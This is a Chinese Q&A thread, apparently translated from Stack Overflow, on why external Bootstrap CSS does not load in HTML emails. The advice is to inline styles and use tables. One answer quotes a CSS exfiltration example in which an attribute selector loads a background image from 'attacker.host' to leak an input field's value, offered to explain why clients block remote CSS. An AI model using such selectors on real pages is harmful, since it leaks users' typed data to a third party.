如何在电子邮件正文链接html格式的外部CSS?这里我没有使用twitter引导程序



我已经完成了Html格式的电子邮件系统。。。所以在那里我可以用html格式发送电子邮件。。带有内部CSS

现在我已经用外部引导CSS做了同样的操作。。

那边的CSS不见了。因此,我使用外部引导css这是我的外部css链接

<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">

然而,当我将外部引导CSS作为Html页面运行时,它正在加载。

但它在电子邮件中不起作用

请就此事向我提出建议。。

  1. 首先,你不能从CDN或任何地方链接外部CSS
  2. 但是你可以从外部插入图像
  3. 你必须在html中编写CSS规则
  4. 并且您不能在电子邮件模板html代码中使用divs
  5. 您必须使用html表来构建模板的结构

有关更多电子邮件模板指南:http://earthintegrate.com/guidelines-for-creating-an-html-email-template/

祝你好运!

Srivin Prabhash

Gmail将剥离<head>中的所有内容,这就是他们的做法。

您可以使用类似mailchips的内联css生成器这样的服务,为您生成所有的内联代码。

阻止外部CSS的原因是它提供了与跟踪像素相同的跟踪功能——给定的电子邮件从远程服务器请求数据,以便能够呈现页面。因此,没有一个合理的电子邮件客户端会允许您使用不受控制的CSS外部链接。

这种滥用CSS的行为可以被视为一个完整的CSS键盘记录程序的长度,这在Mike Gualtieri的帖子中进行了详细讨论。

引用Mike:

CSS Exfil攻击围绕CSS"值选择器"展开,该选择器可用于解析HTML标记属性数据。

这个简单的例子展示了这些选择器是如何被滥用的:

<style>
    #username[value="mikeg"] {
            background:url("https://attacker.host/mikeg");
    }
</style>
<input id="username" value="mikeg" />

在上面的例子中,当HTML/CSS在web浏览器中呈现时,在攻击者控制的远程主机上加载了一个背景图像,表明输入的值为"mikeg"。为了使攻击更加有用,需要额外的文本解析。以下是几个概念验证漏洞,展示了潜在攻击的种类、范围和严重性。


正如Hacker新闻线程中提到的,谨慎的做法是让密码输入完全不受控制,即让浏览器根据用户输入更新DOM

最新更新